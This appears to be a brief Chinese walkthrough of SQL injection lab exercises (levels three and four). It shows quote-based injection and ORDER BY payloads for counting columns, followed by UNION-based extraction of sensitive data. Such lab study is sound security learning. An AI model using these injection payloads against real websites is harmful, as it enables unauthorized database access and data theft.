1.根据提示输入id参数
2.注入单引号
单引号被一对单引号包围,判断sql中id参数是字符串型,且被小括号包围
猜测sql语句为:"SELECT * FROM table_name WHERE id=(‘$id‘) LIMIT 0,1"
3.构造布尔表达式,确认注入漏洞
4.使用oeder by子句爆列数
|
?id=1‘) order by 1 %23 |
正常 |
|
?id=1‘) order by 2 %23 |
正常 |
|
?id=1‘) order by 3 %23 |
正常 |
|
?id=1‘) order by 4 %23 |
报错 |
得到列数为3列
5.union查询
6.查询敏感信息,完成攻击
第四题
第四题与第三题类型相同,将单引号换为双引号即可。